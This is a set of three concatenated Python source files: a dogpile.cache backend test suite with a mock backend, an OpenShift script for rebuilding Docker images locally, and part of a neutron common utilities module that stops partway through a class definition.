    def test_region_set_get_value(self):
        reg = self._region()
        reg.set("some key", "some value")
        eq_(reg.get("some key"), "some value")

    def test_region_set_multiple_values(self):
        reg = self._region()
        values = {'key1': 'value1', 'key2': 'value2', 'key3': 'value3'}
        reg.set_multi(values)
        eq_(values['key1'], reg.get('key1'))
        eq_(values['key2'], reg.get('key2'))
        eq_(values['key3'], reg.get('key3'))

    def test_region_set_zero_multiple_values(self):
        # set_multi with an empty mapping must be a no-op, not an error.
        reg = self._region()
        reg.set_multi({})

    def test_region_get_multiple_values(self):
        reg = self._region()
        key1 = 'value1'
        key2 = 'value2'
        key3 = 'value3'
        reg.set('key1', key1)
        reg.set('key2', key2)
        reg.set('key3', key3)
        values = reg.get_multi(['key1', 'key2', 'key3'])
        eq_(
            [key1, key2, key3], values
        )

    def test_region_get_nothing_multiple(self):
        # Missing keys come back as NO_VALUE, preserving request order.
        reg = self._region()
        values = {'key1': 'value1', 'key3': 'value3', 'key5': 'value5'}
        reg.set_multi(values)
        reg_values = reg.get_multi(['key1', 'key2', 'key3', 'key4', 'key5', 'key6'])
        eq_(
            reg_values,
            ["value1", NO_VALUE, "value3", NO_VALUE,
                "value5", NO_VALUE
             ]
        )

    def test_region_get_empty_multiple(self):
        reg = self._region()
        reg_values = reg.get_multi([])
        eq_(reg_values, [])

    def test_region_delete_multiple(self):
        # Deleting a mix of present and absent keys must not raise.
        reg = self._region()
        values = {'key1': 'value1', 'key2': 'value2', 'key3': 'value3'}
        reg.set_multi(values)
        reg.delete_multi(['key2', 'key10'])
        eq_(values['key1'], reg.get('key1'))
        eq_(NO_VALUE, reg.get('key2'))
        eq_(values['key3'], reg.get('key3'))
        eq_(NO_VALUE, reg.get('key10'))

    def test_region_set_get_nothing(self):
        reg = self._region()
        eq_(reg.get("some key"), NO_VALUE)

    def test_region_creator(self):
        reg = self._region()

        def creator():
            return "some value"
        eq_(reg.get_or_create("some key", creator), "some value")

    def test_threaded_dogpile(self):
        # run a basic dogpile concurrency test.
        # note the concurrency of dogpile itself
        # is intensively tested as part of dogpile.
        reg = self._region(config_args={"expiration_time": .25})
        lock = Lock()
        canary = []

        def creator():
            # Record whether we got the lock uncontended; overlapping
            # creators would append False.
            ack = lock.acquire(False)
            canary.append(ack)
            time.sleep(.5)
            if ack:
                lock.release()
            return "some value"

        def f():
            for x in range(5):
                reg.get_or_create("some key", creator)
                time.sleep(.5)

        threads = [Thread(target=f) for i in range(5)]
        for t in threads:
            t.start()
        for t in threads:
            t.join()
        assert len(canary) > 3
        assert False not in canary

    def test_threaded_get_multi(self):
        reg = self._region(config_args={"expiration_time": .25})
        locks = dict((str(i), Lock()) for i in range(11))

        canary = collections.defaultdict(list)

        def creator(*keys):
            assert keys
            # Each key's lock must be uncontended if the dogpile lock is
            # doing its job; contention appends False for that key.
            ack = [locks[key].acquire(False) for key in keys]
            for acq, key in zip(ack, keys):
                canary[key].append(acq)
            time.sleep(.5)
            for acq, key in zip(ack, keys):
                if acq:
                    locks[key].release()
            return ["some value %s" % k for k in keys]

        def f():
            for x in range(5):
                reg.get_or_create_multi(
                    [str(random.randint(1, 10))
                        for i in range(random.randint(1, 5))],
                    creator)
                time.sleep(.5)

        # BUG FIX: a leftover debugging shortcut ("f(); return") made
        # everything below unreachable, so this "threaded" test ran a
        # single f() call -- which could also fail the "> 10" assertion
        # by chance (5 iterations of 1-5 keys may total <= 10). Running
        # the intended 5 threads guarantees at least 25 canary entries.
        threads = [Thread(target=f) for i in range(5)]
        for t in threads:
            t.start()
        for t in threads:
            t.join()
        assert sum([len(v) for v in canary.values()]) > 10
        for l in canary.values():
            assert False not in l

    def test_region_delete(self):
        # Double-delete must be tolerated.
        reg = self._region()
        reg.set("some key", "some value")
        reg.delete("some key")
        reg.delete("some key")
        eq_(reg.get("some key"), NO_VALUE)

    def test_region_expire(self):
        reg = self._region(config_args={"expiration_time": .25})
        counter = itertools.count(1)

        def creator():
            return "some value %d" % next(counter)
        eq_(reg.get_or_create("some key", creator), "some value 1")
        time.sleep(.4)
        # Expired value is still retrievable when expiration is ignored...
        eq_(reg.get("some key", ignore_expiration=True), "some value 1")
        # ...but get_or_create regenerates it.
        eq_(reg.get_or_create("some key", creator), "some value 2")
        eq_(reg.get("some key"), "some value 2")

    def test_decorated_fn_functionality(self):
        # test for any quirks in the fn decoration that interact
        # with the backend.
        reg = self._region()

        counter = itertools.count(1)

        @reg.cache_on_arguments()
        def my_function(x, y):
            return next(counter) + x + y

        eq_(my_function(3, 4), 8)
        eq_(my_function(5, 6), 13)
        # Repeated arguments hit the cache; argument order matters.
        eq_(my_function(3, 4), 8)
        eq_(my_function(4, 3), 10)

        my_function.invalidate(4, 3)
        eq_(my_function(4, 3), 11)

    def test_exploding_value_fn(self):
        # An exception in the creator must propagate, not be cached.
        reg = self._region()

        def boom():
            raise Exception("boom")

        assert_raises_message(
            Exception,
            "boom",
            reg.get_or_create, "some_key", boom
        )
class _GenericMutexTest(_GenericBackendFixture, TestCase):
    """Conformance tests for a backend's distributed mutex implementation."""

    def test_mutex(self):
        # Basic acquire/release semantics: a held mutex refuses a
        # non-blocking acquire, and can be re-acquired after release.
        backend = self._backend()
        mutex = backend.get_mutex("foo")

        ac = mutex.acquire()
        assert ac
        ac2 = mutex.acquire(False)
        assert not ac2
        mutex.release()
        ac3 = mutex.acquire()
        assert ac3
        mutex.release()

    def test_mutex_threaded(self):
        # Verify mutual exclusion across threads: while holding the
        # backend mutex, the local Lock must always be uncontended.
        backend = self._backend()
        mutex = backend.get_mutex("foo")

        lock = Lock()
        canary = []

        def f():
            for x in range(5):
                mutex = backend.get_mutex("foo")
                mutex.acquire()
                for y in range(5):
                    ack = lock.acquire(False)
                    canary.append(ack)
                    time.sleep(.002)
                    if ack:
                        lock.release()
                mutex.release()
                time.sleep(.02)

        threads = [Thread(target=f) for i in range(5)]
        for t in threads:
            t.start()
        for t in threads:
            t.join()
        assert False not in canary

    def test_mutex_reentrant_across_keys(self):
        # Holding the mutex for one key must not block mutexes for
        # other keys in the same thread.
        backend = self._backend()
        for x in range(3):
            m1 = backend.get_mutex("foo")
            m2 = backend.get_mutex("bar")
            try:
                m1.acquire()
                assert m2.acquire(False)
                assert not m2.acquire(False)
                m2.release()

                assert m2.acquire(False)
                assert not m2.acquire(False)
                m2.release()
            finally:
                m1.release()

    def test_reentrant_dogpile(self):
        # A creator may itself call get_or_create for a different key
        # without deadlocking.
        reg = self._region()

        def create_foo():
            return "foo" + reg.get_or_create("bar", create_bar)

        def create_bar():
            return "bar"

        eq_(
            reg.get_or_create("foo", create_foo),
            "foobar"
        )
        eq_(
            reg.get_or_create("foo", create_foo),
            "foobar"
        )
class MockMutex(object):
    """No-op mutex handed out by MockBackend; acquisition always succeeds."""

    def __init__(self, key):
        # Remember which cache key this mutex nominally guards.
        self.key = key

    def acquire(self, blocking=True):
        # No real locking is performed; report success unconditionally.
        return True

    def release(self):
        # Nothing was acquired, so there is nothing to undo.
        return
class MockBackend(CacheBackend):
    """In-memory, dict-backed cache backend used to exercise the region API."""

    def __init__(self, arguments):
        self.arguments = arguments
        self._cache = {}

    def get_mutex(self, key):
        # Locking is a no-op for the mock backend.
        return MockMutex(key)

    def get(self, key):
        # Absent keys are reported via the NO_VALUE sentinel, never KeyError.
        return self._cache.get(key, NO_VALUE)

    def get_multi(self, keys):
        return [self._cache.get(key, NO_VALUE) for key in keys]

    def set(self, key, value):
        self._cache[key] = value

    def set_multi(self, mapping):
        self._cache.update(mapping)

    def delete(self, key):
        # Deleting a missing key is tolerated.
        self._cache.pop(key, None)

    def delete_multi(self, keys):
        for key in keys:
            self._cache.pop(key, None)

register_backend("mock", __name__, "MockBackend")
|
|
#!/usr/bin/env python
import sys
from shutil import copy, rmtree
import distutils.dir_util as dir_util
from subprocess import call
from tempfile import mkdtemp
from atexit import register
from os import getenv, mkdir, remove
from os.path import abspath, dirname, isdir, join
# Print usage and exit when the first argument is any recognised help flag.
# NOTE: this script uses Python 2 print statements throughout and is not
# Python 3 compatible.
if len(sys.argv) > 1 and sys.argv[1] in ['-h', '--h', '-help', '--help']:
    print """Quickly re-build images depending on OpenShift Origin build artifacts.
This script re-builds OpenShift Origin images quickly. It is intended
to be used by developers for quick, iterative development of images
that depend on binaries, RPMs, or other artifacts that the Origin build
process generates. The script works by creating a temporary context
directory for a Docker build, adding a simple Dockerfile FROM the image
you wish to rebuild, ADDing in static files to overwrite, and building.
The script supports ADDing binaries from origin/_output/local/bin/linux/amd64/
and ADDing static files from the original context directories under the
origin/images/ directories.
Usage:
[OS_DEBUG=true] [OS_IMAGE_PREFIX=prefix] build-local-images.py [IMAGE...]
Specific images can be specified to be built with either the full name
of the image (e.g. openshift3/ose-haproxy-router) or the name sans prefix
(e.g. haproxy-router).
The following environment veriables are honored by this script:
 - $OS_IMAGE_PREFIX: one of [openshift/origin, openshift3/ose]
 - $OS_DEBUG: if set, debugging information will be printed
Examples:
  # build all images
  build-local-images.py
  # build only the f5-router image
  build-local-images.py f5-router
  # build with a different image prefix
  OS_IMAGE_PREFIX=openshift3/ose build-local-images.sh
Options:
  -h,--h, -help,--help: show this help-text
"""
    exit(2)
# Image prefix is configurable so the same script serves both the
# origin (openshift/origin) and enterprise (openshift3/ose) trees.
os_image_prefix = getenv("OS_IMAGE_PREFIX", "openshift/origin")
# NOTE(review): maxsplit=2 can yield three parts if the prefix contains
# two slashes, which would make this unpacking raise -- confirm the
# accepted OS_IMAGE_PREFIX values never contain more than one slash.
image_namespace, image_prefix = os_image_prefix.split("/", 2)

# Per-image build description:
#   directory      -- context dir under origin/images/ (or as given)
#   vendor_dir     -- optional alternate root for build output
#   binaries       -- {artifact name: path inside the container}
#   files          -- {context-relative source: path inside the container}
#   enable_default -- when False, only built if requested explicitly
image_config = {
    image_prefix: {
        "directory": "origin",
        "binaries": {
            "openshift": "/usr/bin/openshift"
        },
        "files": {}
    },
    "deployer": {
        "directory": "deployer",
        "binaries": {
            "openshift": "/usr/bin/openshift"
        },
        "files": {}
    },
    "recycler": {
        "directory": "recycler",
        "binaries": {
            "openshift": "/usr/bin/openshift"
        },
        "files": {}
    },
    "docker-builder": {
        "directory": "builder/docker/docker-builder",
        "binaries": {
            "openshift": "/usr/bin/openshift"
        },
        "files": {}
    },
    "sti-builder": {
        "directory": "builder/docker/sti-builder",
        "binaries": {
            "openshift": "/usr/bin/openshift"
        },
        "files": {}
    },
    "f5-router": {
        "directory": "router/f5",
        "binaries": {
            "openshift": "/usr/bin/openshift"
        },
        "files": {}
    },
    "nginx-router": {
        "directory": "router/nginx",
        "binaries": {
            "openshift": "/usr/bin/openshift"
        },
        "files": {
            ".": "/var/lib/nginx"
        }
    },
    "haproxy-router": {
        "directory": "router/haproxy",
        "binaries": {
            "openshift": "/usr/bin/openshift"
        },
        "files": {
            ".": "/var/lib/haproxy"
        }
    },
    "keepalived-ipfailover": {
        "directory": "ipfailover/keepalived",
        "binaries": {
            "openshift": "/usr/bin/openshift"
        },
        "files": {
            ".": "/var/lib/ipfailover/keepalived"
        }
    },
    "node": {
        "directory": "node",
        "binaries": {
            "openshift": "/usr/bin/openshift"
        },
        "files": {}
    },
    "openvswitch": {
        "directory": "openvswitch",
        "binaries": {
            "openshift": "/usr/bin/openshift"
        },
        "files": {}
    },
    "service-catalog": {
        "directory": "service-catalog",
        "vendor_dir": "cmd/service-catalog/go/src/github.com/kubernetes-incubator/service-catalog",
        "binaries": {
            "service-catalog": "/usr/bin/service-catalog",
        },
        "files": {},
        "enable_default": False,
    },
}
def image_rebuild_requested(image):
    """
    Decide whether *image* should be rebuilt: either the user named it
    (full name or suffix) on the command line, or no images were named
    at all and the image is enabled by default.
    """
    if len(sys.argv) == 1:
        # No explicit request: fall back to the image's default flag.
        return image_config[image].get("enable_default", True)
    return image in sys.argv or full_name(image) in sys.argv
def full_name(image):
    """
    Return the image's fully qualified name: ``namespace/image`` for the
    few images published without the prefix, ``namespace/prefix-image``
    for everything else.
    """
    unprefixed = ("node", "openvswitch", image_prefix)
    if image in unprefixed:
        return "{}/{}".format(image_namespace, image)
    return "{}/{}-{}".format(image_namespace, image_prefix, image)
def add_to_context(context_dir, source, destination, container_destination):
    """
    Copy *source* (file or directory) into the build context at
    *destination*, and append a matching ADD instruction to the
    context's Dockerfile so it lands at *container_destination*.
    """
    debug("Adding file:\n\tfrom {}\n\tto {}\n\tincluding in container at {}".format(
        source,
        join(context_dir, destination),
        container_destination)
    )
    target = abspath(join(context_dir, destination))
    if isdir(source):
        dir_util.copy_tree(source, target)
    else:
        copy(source, target)

    with open(join(context_dir, "Dockerfile"), "a") as dockerfile:
        dockerfile.write("ADD {} {}\n".format(destination, container_destination))
def debug(message):
    # Emit diagnostic output only when OS_DEBUG is set in the environment.
    # NOTE: Python 2 print statement.
    if getenv("OS_DEBUG"):
        print "[DEBUG] {}".format(message)
# Locate the repository root relative to this script, and prepare a
# temporary Docker build context that is cleaned up automatically at exit.
os_root = abspath(join(dirname(__file__), ".."))
os_image_path = join(os_root, "images")

context_dir = mkdtemp()
register(rmtree, context_dir)
debug("Created temporary context dir at {}".format(context_dir))
mkdir(join(context_dir, "bin"))
mkdir(join(context_dir, "src"))

build_occurred = False
for image in image_config:
    if not image_rebuild_requested(image):
        continue
    build_occurred = True
    print "[INFO] Building {}...".format(image)

    # Each image starts a fresh Dockerfile FROM the image being rebuilt.
    with open(join(context_dir, "Dockerfile"), "w+") as dockerfile:
        dockerfile.write("FROM {}\n".format(full_name(image)))

    binary_dir_args = ["_output", "local", "bin", "linux", "amd64"]
    config = image_config[image]
    for binary in config.get("binaries", []):
        # Vendored components keep their build output under their own tree.
        if "vendor_dir" in config:
            os_bin_path = join(os_root, config.get("vendor_dir"), *binary_dir_args)
        else:
            os_bin_path = join(os_root, *binary_dir_args)
        add_to_context(
            context_dir,
            source=join(os_bin_path, binary),
            destination=join("bin", binary),
            container_destination=config["binaries"][binary]
        )

    mkdir(join(context_dir, "src", image))
    for file in config.get("files", []):
        add_to_context(
            context_dir,
            source=join(os_image_path, config["directory"], file),
            destination=join("src", image, file),
            container_destination=config["files"][file]
        )

    debug("Initiating Docker build with Dockerfile:\n{}".format(open(join(context_dir, "Dockerfile")).read()))
    call(["docker", "build", "-t", full_name(image), "."], cwd=context_dir)

    # Reset the per-image context pieces so the next image starts clean.
    remove(join(context_dir, "Dockerfile"))
    rmtree(join(context_dir, "src", image))

if not build_occurred and len(sys.argv) > 1:
    # The user asked for specific images but none matched a known one.
    print "[ERROR] The provided image names ({}) did not match any buildable images.".format(
        ", ".join(sys.argv[1:])
    )
    print "[ERROR] This script knows how to build:\n\t{}".format(
        "\n\t".join(map(full_name, image_config.keys()))
    )
    exit(1)
|
|
# Copyright 2011, VMware, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# Borrowed from nova code base, more utilities will be added/borrowed as and
# when needed.
"""Utilities and helper functions."""
import collections
import datetime
import decimal
import errno
import functools
import hashlib
import multiprocessing
import netaddr
import os
import random
import signal
import socket
import sys
import tempfile
import uuid
import debtcollector
from eventlet.green import subprocess
from oslo_concurrency import lockutils
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import excutils
from oslo_utils import importutils
import six
from stevedore import driver
from neutron.common import constants as n_const
from neutron.i18n import _LE
# ISO 8601 timestamp format (UTC, "Z" suffix) used for serialization.
TIME_FORMAT = "%Y-%m-%dT%H:%M:%SZ"
LOG = logging.getLogger(__name__)
# All neutron lock names share this prefix so external tooling can
# identify neutron-owned lock files.
SYNCHRONIZED_PREFIX = 'neutron-'
synchronized = lockutils.synchronized_with_prefix(SYNCHRONIZED_PREFIX)
class cache_method_results(object):
    """This decorator is intended for object methods only.

    The decorated method's results are memoized in the *instance's*
    ``_cache`` attribute (which must expose ``get``/``set``), keyed by
    the fully qualified method name plus the call arguments.
    """
    def __init__(self, func):
        self.func = func
        functools.update_wrapper(self, func)
        # Used to log the "no _cache configured" warning only once.
        self._first_call = True
        # Sentinel distinguishing "not cached" from a cached None.
        self._not_cached = object()

    def _get_from_cache(self, target_self, *args, **kwargs):
        func_name = "%(module)s.%(class)s.%(func_name)s" % {
            'module': target_self.__module__,
            'class': target_self.__class__.__name__,
            'func_name': self.func.__name__,
        }
        key = (func_name,) + args
        if kwargs:
            # kwargs are folded in as a sorted tuple so the key is hashable
            # and insensitive to keyword ordering.
            key += dict2tuple(kwargs)
        try:
            item = target_self._cache.get(key, self._not_cached)
        except TypeError:
            # Unhashable arguments: fall through to an uncached call.
            LOG.debug("Method %(func_name)s cannot be cached due to "
                      "unhashable parameters: args: %(args)s, kwargs: "
                      "%(kwargs)s",
                      {'func_name': func_name,
                       'args': args,
                       'kwargs': kwargs})
            return self.func(target_self, *args, **kwargs)

        if item is self._not_cached:
            # Cache miss: compute and store with no TTL (None).
            item = self.func(target_self, *args, **kwargs)
            target_self._cache.set(key, item, None)

        return item

    def __call__(self, target_self, *args, **kwargs):
        if not hasattr(target_self, '_cache'):
            raise NotImplementedError(
                "Instance of class %(module)s.%(class)s must contain _cache "
                "attribute" % {
                    'module': target_self.__module__,
                    'class': target_self.__class__.__name__})
        if not target_self._cache:
            # A falsy _cache disables caching; warn only on the first call.
            if self._first_call:
                LOG.debug("Instance of class %(module)s.%(class)s doesn't "
                          "contain attribute _cache therefore results "
                          "cannot be cached for %(func_name)s.",
                          {'module': target_self.__module__,
                           'class': target_self.__class__.__name__,
                           'func_name': self.func.__name__})
                self._first_call = False
            return self.func(target_self, *args, **kwargs)
        return self._get_from_cache(target_self, *args, **kwargs)

    def __get__(self, obj, objtype):
        # Descriptor protocol: bind the wrapped call to the instance.
        return functools.partial(self.__call__, obj)
@debtcollector.removals.remove(message="This will removed in the N cycle.")
def read_cached_file(filename, cache_info, reload_func=None):
    """Read from a file if it has been modified.

    :param cache_info: dictionary to hold opaque cache.
    :param reload_func: optional function to be called with data when
                        file is reloaded due to a modification.
    :returns: data from file
    """
    mtime = os.path.getmtime(filename)
    stale = not cache_info or cache_info.get('mtime') != mtime
    if stale:
        LOG.debug("Reloading cached file %s", filename)
        with open(filename) as fap:
            cache_info['data'] = fap.read()
        cache_info['mtime'] = mtime
        if reload_func:
            reload_func(cache_info['data'])
    return cache_info['data']
@debtcollector.removals.remove(message="This will removed in the N cycle.")
def find_config_file(options, config_file):
    """Return the first config file found.

    We search for the paste config file in the following order:
    * If --config-file option is used, use that
    * Search for the configuration files via common cfg directories
    :retval Full path to config file, or None if no config file found
    """
    fix_path = lambda p: os.path.abspath(os.path.expanduser(p))
    # Explicit --config-file wins outright when the file exists.
    if options.get('config_file'):
        if os.path.exists(options['config_file']):
            return fix_path(options['config_file'])

    dir_to_common = os.path.dirname(os.path.abspath(__file__))
    root = os.path.join(dir_to_common, '..', '..', '..', '..')
    # Handle standard directory search for the config file; order here
    # defines precedence (first match wins below).
    config_file_dirs = [fix_path(os.path.join(os.getcwd(), 'etc')),
                        fix_path(os.path.join('~', '.neutron-venv', 'etc',
                                              'neutron')),
                        fix_path('~'),
                        os.path.join(cfg.CONF.state_path, 'etc'),
                        os.path.join(cfg.CONF.state_path, 'etc', 'neutron'),
                        fix_path(os.path.join('~', '.local',
                                              'etc', 'neutron')),
                        '/usr/etc/neutron',
                        '/usr/local/etc/neutron',
                        '/etc/neutron/',
                        '/etc']

    # Plugin configs live in a per-plugin subdirectory of each location.
    if 'plugin' in options:
        config_file_dirs = [
            os.path.join(x, 'neutron', 'plugins', options['plugin'])
            for x in config_file_dirs
        ]

    # In-tree plugin etc/ directories are searched last.
    if os.path.exists(os.path.join(root, 'plugins')):
        plugins = [fix_path(os.path.join(root, 'plugins', p, 'etc'))
                   for p in os.listdir(os.path.join(root, 'plugins'))]
        plugins = [p for p in plugins if os.path.isdir(p)]
        config_file_dirs.extend(plugins)

    for cfg_dir in config_file_dirs:
        cfg_file = os.path.join(cfg_dir, config_file)
        if os.path.exists(cfg_file):
            return cfg_file
def ensure_dir(dir_path):
    """Ensure a directory with 755 permissions mode.

    Creating an already-existing directory is not an error; any other
    OSError is re-raised.
    """
    try:
        os.makedirs(dir_path, 0o755)
    except OSError as exc:
        # Tolerate a concurrent (or earlier) creation of the same path.
        if exc.errno == errno.EEXIST:
            return
        raise
def _subprocess_setup():
    # Python installs a SIGPIPE handler by default. This is usually not what
    # non-Python subprocesses expect.
    # Restoring SIG_DFL lets the child die normally on a broken pipe.
    signal.signal(signal.SIGPIPE, signal.SIG_DFL)
def subprocess_popen(args, stdin=None, stdout=None, stderr=None, shell=False,
                     env=None, preexec_fn=_subprocess_setup, close_fds=True):
    # Thin wrapper over (eventlet's green) subprocess.Popen that defaults
    # to restoring SIGPIPE in the child and closing inherited fds.
    return subprocess.Popen(args, shell=shell, stdin=stdin, stdout=stdout,
                            stderr=stderr, preexec_fn=preexec_fn,
                            close_fds=close_fds, env=env)
def parse_mappings(mapping_list, unique_values=True):
    """Parse a list of mapping strings into a dictionary.

    :param mapping_list: a list of strings of the form '<key>:<value>'
    :param unique_values: values must be unique if True
    :returns: a dict mapping keys to values
    """
    mappings = {}
    for raw in mapping_list:
        entry = raw.strip()
        if not entry:
            # Blank entries are skipped silently.
            continue
        parts = entry.split(':')
        if len(parts) != 2:
            raise ValueError(_("Invalid mapping: '%s'") % entry)
        key = parts[0].strip()
        value = parts[1].strip()
        if not key:
            raise ValueError(_("Missing key in mapping: '%s'") % entry)
        if not value:
            raise ValueError(_("Missing value in mapping: '%s'") % entry)
        if key in mappings:
            raise ValueError(_("Key %(key)s in mapping: '%(mapping)s' not "
                               "unique") % {'key': key, 'mapping': entry})
        if unique_values and value in mappings.values():
            raise ValueError(_("Value %(value)s in mapping: '%(mapping)s' "
                               "not unique") % {'value': value,
                                                'mapping': entry})
        mappings[key] = value
    return mappings
def get_hostname():
    """Return this machine's hostname as reported by the socket module."""
    return socket.gethostname()
def get_first_host_ip(net, ip_version):
    """Return the first host address of *net* (network address + 1) as a str.

    :param net: a netaddr.IPNetwork-like object exposing ``first``
    :param ip_version: 4 or 6, forwarded to netaddr.IPAddress
    """
    return str(netaddr.IPAddress(net.first + 1, ip_version))
def compare_elements(a, b):
    """Return True when *a* and *b* hold the same elements.

    Ordering and duplicates are ignored; a None argument is treated as
    an empty collection.
    """
    left = [] if a is None else a
    right = [] if b is None else b
    return set(left) == set(right)
def safe_sort_key(value):
    """Return value hash or build one for dictionaries.

    Mappings are not orderable, so they are converted to their sorted
    item list; every other value is returned unchanged.
    """
    # collections.Mapping was removed in Python 3.10 (deprecated since
    # 3.3); collections.abc is the supported location. Imported locally
    # to avoid touching the module's import block.
    import collections.abc
    if isinstance(value, collections.abc.Mapping):
        return sorted(value.items())
    return value
def dict2str(dic):
    """Serialize *dic* to a 'k1=v1,k2=v2' string with keys in sorted order."""
    # sorted(dic.items()) behaves identically on Python 2 and 3, unlike
    # six.iteritems, which drags in the third-party six package.
    return ','.join("%s=%s" % (key, val)
                    for key, val in sorted(dic.items()))
def str2dict(string):
    """Parse a 'k1=v1,k2=v2' string (values may themselves contain '=')
    back into a dict."""
    return dict(item.split('=', 1) for item in string.split(','))
def dict2tuple(d):
    """Return the dict's items as a key-sorted tuple (hashable form)."""
    return tuple(sorted(d.items()))
def diff_list_of_dict(old_list, new_list):
    """Return (added, removed) dicts between two lists of flat dicts.

    Dicts are compared by their serialized 'k=v,...' form, so they must
    round-trip through dict2str/str2dict.
    """
    old_set = {dict2str(entry) for entry in old_list}
    new_set = {dict2str(entry) for entry in new_list}
    added = [str2dict(item) for item in new_set - old_set]
    removed = [str2dict(item) for item in old_set - new_set]
    return added, removed
def is_extension_supported(plugin, ext_alias):
    """Return True if *plugin* advertises the given extension alias."""
    aliases = getattr(plugin, "supported_extension_aliases", [])
    return ext_alias in aliases
def log_opt_values(log):
    """Dump all registered oslo.config option values to *log* at DEBUG."""
    cfg.CONF.log_opt_values(log, logging.DEBUG)
def get_random_mac(base_mac):
    """Generate a MAC address string, preserving the base's fixed octets.

    The first three octets always come from *base_mac* (a list of six
    hex-string octets). The fourth octet is also preserved unless it is
    '00'; the remaining octets are random.
    """
    octets = [int(base_mac[0], 16), int(base_mac[1], 16),
              int(base_mac[2], 16), random.randint(0x00, 0xff),
              random.randint(0x00, 0xff), random.randint(0x00, 0xff)]
    if base_mac[3] != '00':
        octets[3] = int(base_mac[3], 16)
    return ':'.join("%02x" % octet for octet in octets)
def get_random_string(length):
    """Get a random hex string of the specified length.

    based on Cinder library
    cinder/transfer/api.py
    """
    # The previous implementation reseeded the *global* PRNG from the
    # current microsecond, which both made the output guessable (only
    # one million possible seeds) and clobbered any seed callers had
    # set. Hashing os.urandom output is unpredictable and side-effect
    # free while keeping the same hex-string contract.
    rndstr = ""
    while len(rndstr) < length:
        rndstr += hashlib.sha224(os.urandom(64)).hexdigest()
    return rndstr[0:length]
def get_dhcp_agent_device_id(network_id, host):
    """Build the deterministic device id for a network's DHCP port.

    Only the hostname portion of *host* is used (any domain suffix is
    dropped), so a short hostname and an FQDN for the same machine
    produce the same id.
    """
    hostname = host.partition('.')[0]
    host_uuid = uuid.uuid5(uuid.NAMESPACE_DNS, str(hostname))
    return 'dhcp%s-%s' % (host_uuid, network_id)
def cpu_count():
    """Return the number of CPUs, or 1 where it cannot be determined."""
    try:
        count = multiprocessing.cpu_count()
    except NotImplementedError:
        count = 1
    return count
class exception_logger(object):
    """Decorator that logs any exception raised by the wrapped function.

    :param logger: callable used to log the exception; defaults to the
        ``exception`` method of a logger named after the function's module
    :returns: the wrapped function's value when no exception is raised;
        otherwise the exception is logged and re-raised
    """
    def __init__(self, logger=None):
        self.logger = logger

    def __call__(self, func):
        # Resolve the default logger lazily so it is named after the
        # decorated function's module.
        if self.logger is None:
            self.logger = logging.getLogger(func.__module__).exception

        def wrapper(*args, **kwargs):
            try:
                return func(*args, **kwargs)
            except Exception as exc:
                with excutils.save_and_reraise_exception():
                    self.logger(exc)
        return wrapper
def is_dvr_serviced(device_owner):
    """Check if the port need to be serviced by DVR

    Helper function to check the device owners of the
    ports in the compute and service node to make sure
    if they are required for DVR or any service directly or
    indirectly associated with DVR.
    """
    # Compute ports (matched by prefix) plus these exact owners are
    # DVR-serviced.
    dvr_serviced_device_owners = (n_const.DEVICE_OWNER_LOADBALANCER,
                                  n_const.DEVICE_OWNER_LOADBALANCERV2,
                                  n_const.DEVICE_OWNER_DHCP)
    return (device_owner.startswith(n_const.DEVICE_OWNER_COMPUTE_PREFIX) or
            device_owner in dvr_serviced_device_owners)
@debtcollector.removals.remove(message="This will removed in the N cycle.")
def get_keystone_url(conf):
    """Build the keystone v2.0 endpoint URL from auth config options."""
    if conf.auth_uri:
        auth_uri = conf.auth_uri.rstrip('/')
    else:
        # Fall back to assembling the URL from its individual parts.
        auth_uri = ('%(protocol)s://%(host)s:%(port)s' %
                    {'protocol': conf.auth_protocol,
                     'host': conf.auth_host,
                     'port': conf.auth_port})
    # NOTE(ihrachys): all existing consumers assume version 2.0
    return '%s/v2.0/' % auth_uri
def ip_to_cidr(ip, prefix=None):
    """Convert an ip with no prefix to cidr notation

    :param ip: An ipv4 or ipv6 address. Convertable to netaddr.IPNetwork.
    :param prefix: Optional prefix. If None, the default 32 will be used for
        ipv4 and 128 for ipv6.
    :returns: the address in CIDR string form, e.g. '10.0.0.1/32'
    """
    net = netaddr.IPNetwork(ip)
    if prefix is not None:
        # Can't pass ip and prefix separately. Must concatenate strings.
        net = netaddr.IPNetwork(str(net.ip) + '/' + str(prefix))
    return str(net)
def fixed_ip_cidrs(fixed_ips):
    """Create a list of a port's fixed IPs in cidr notation.

    :param fixed_ips: A neutron port's fixed_ips dictionary
    :returns: list of CIDR strings; each entry uses the fixed IP's own
        'prefixlen' when present, otherwise the address-family default
        (see ip_to_cidr)
    """
    return [ip_to_cidr(fixed_ip['ip_address'], fixed_ip.get('prefixlen'))
            for fixed_ip in fixed_ips]
def is_cidr_host(cidr):
    """Determines if the cidr passed in represents a single host network

    :param cidr: Either an ipv4 or ipv6 cidr.
    :returns: True if the cidr is /32 for ipv4 or /128 for ipv6.
    :raises ValueError: raises if cidr does not contain a '/'. This disallows
        plain IP addresses specifically to avoid ambiguity.
    """
    if '/' not in str(cidr):
        raise ValueError("cidr doesn't contain a '/'")
    net = netaddr.IPNetwork(cidr)
    if net.version == 4:
        # A /32 covers exactly one IPv4 address.
        return net.prefixlen == n_const.IPv4_BITS
    # A /128 covers exactly one IPv6 address.
    return net.prefixlen == n_const.IPv6_BITS
def ip_version_from_int(ip_version_int):
    """Map the integer 4 or 6 to the corresponding IP version constant.

    :raises ValueError: for any value other than 4 or 6
    """
    if ip_version_int == 4:
        return n_const.IPv4
    if ip_version_int == 6:
        return n_const.IPv6
    raise ValueError(_('Illegal IP version number'))
def is_port_trusted(port):
    """Used to determine if port can be trusted not to attack network.

    Trust is currently based on the device_owner field starting with
    'network:' since we restrict who can use that in the default
    policy.json file.
    """
    owner = port['device_owner']
    return owner.startswith('network:')
class DelayedStringRenderer(object):
    """Takes a callable and its args and calls when __str__ is called

    Useful for when an argument to a logging statement is expensive to
    create. This will prevent the callable from being called if it's
    never converted to a string.
    """
    def __init__(self, function, *args, **kwargs):
        # Stored untouched; evaluation is deferred until __str__ runs.
        self.function = function
        self.args = args
        self.kwargs = kwargs

    def __str__(self):
        """Invoke the deferred callable and stringify its result."""
